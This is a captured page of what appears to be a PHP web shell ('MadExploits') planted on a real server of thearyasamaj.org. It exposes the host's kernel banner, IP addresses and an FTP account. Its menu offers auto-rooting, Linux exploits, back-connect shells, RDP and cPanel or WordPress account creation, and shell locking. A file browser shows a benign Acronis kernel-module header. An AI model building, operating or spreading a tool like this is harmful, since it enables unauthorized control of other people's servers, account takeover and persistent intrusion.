Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
file_protector-1.1-1565 /
ftrace_hooks /
[ HOME SHELL ]
Name
Size
Permission
Action
audit_user.h
145
B
-rw-r--r--
fsnotify_events.c
5.57
KB
-rw-r--r--
fsnotify_events.h
382
B
-rw-r--r--
fsnotify_listener.c
9.91
KB
-rw-r--r--
fsnotify_listener.h
1.08
KB
-rw-r--r--
ftrace_events.c
20.17
KB
-rw-r--r--
ftrace_events.h
732
B
-rw-r--r--
reg_tools.h
694
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : reg_tools.h
/** @file reg_tools.h @brief Tools for working with registers @details Copyright (c) 2024 Acronis International GmbH @author Denis Kopyrin (denis.kopyrin@acronis.com) @since $Id: $ */ #pragma once // A more generic option would be 'regs_get_kernel_argument' but kernels have a very sparring support of it // Use the following macro for now #define GET_KERNEL_ARGUMENT0(regs) regs->di #define GET_KERNEL_ARGUMENT1(regs) regs->si #define GET_KERNEL_ARGUMENT2(regs) regs->dx #define GET_KERNEL_ARGUMENT3(regs) regs->cx #define GET_KERNEL_ARGUMENT4(regs) regs->r8 #define GET_KERNEL_ARGUMENT5(regs) regs->r9 #define GET_KERNEL_ARGUMENT(regs, num) GET_KERNEL_ARGUMENT##num(regs)
Close